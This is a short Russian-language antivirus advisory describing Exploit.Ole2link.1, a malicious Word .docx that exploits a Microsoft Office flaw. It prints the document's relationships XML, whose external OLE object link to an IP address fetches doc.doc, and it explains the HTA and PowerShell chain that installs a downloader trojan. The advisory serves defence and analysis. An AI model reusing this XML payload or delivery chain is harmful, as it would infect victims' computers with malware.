Exploit.Ole2link.1 - новый эксплойт для Microsoft Office


Exploit.Ole2link.1 - эксплойт, использующий технологию XML, предназначенный для эксплуатации уязвимости в офисном пакете Microsoft Office.

Эксплойт реализован в виде документа Microsoft Word, имеет расширение .docx и содержит следующие строки:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://***.org/package/2006/relationships"><Relationship Id="rId3" Type="http:// ***.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http:// ***.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://***/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://***/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://***/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://***/officeDocument/2006/relationships/oleObject" Target="http://144.217.14.173/doc.doc" TargetMode="External"/><Relationship Id="rId4" Type="http://***/officeDocument/2006/relationships/image" Target="media/image1.emf"/></Relationships>


Открытие такого документа вызывает загрузку другого файла с именем doc.doc, который содержит встроенный HTA-сценарий. Данный сценарий детектируется Dr.Web, как PowerShell.DownLoader.72.

PowerShell.DownLoader.72 - HTA-сценарий, написанный с использованием синтаксиса Windows Script, вызывает командный интерпретатор PowerShell. В нем обрабатывается другой вредоносный скрипт, скачивающий на атакуемый компьютер исполняемый файл.

При помощи этого механизма злоумышленники устанавливают на компьютеры жертв трояна-загрузчика Trojan.DownLoader24.49614, предназначенного для скачивания и последующего запуска на инфицированной машине другого вредоносного ПО.